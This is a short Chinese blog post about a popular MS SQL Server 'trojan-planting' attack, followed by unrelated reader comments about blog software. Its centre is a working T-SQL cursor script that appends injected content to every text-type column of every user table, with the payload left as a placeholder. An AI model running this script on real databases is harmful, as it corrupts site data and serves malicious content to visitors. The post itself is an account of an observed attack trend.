最近比较流行的数据库挂马
作者:茄子宝
以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。
SQL语句如下:
用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
———————YD的分割——————————–
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’+@T+’] set [’+@C+’]=
rtrim(convert(varchar,[’+@C+’]))+
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
———————YD的分割——————————–
遇到过相似的情况,不过只是个别文章后挂马了,原来可以这么简单的挂,并且非专业人员不容易解决这个问题
我的BLOG评论不了
貌似,没有看懂……
@x140cc 现在应该没问题了吧
昨天你给的模板,哈哈,只能显示首页。
换成BOBLOG了,同样改了个简洁的页面!!!WP许多功能还要装插件,比较郁闷。另外BO感觉比WP稍稍快一点。
你装的WP是什么版本
2.5,中文和英文都尝试了;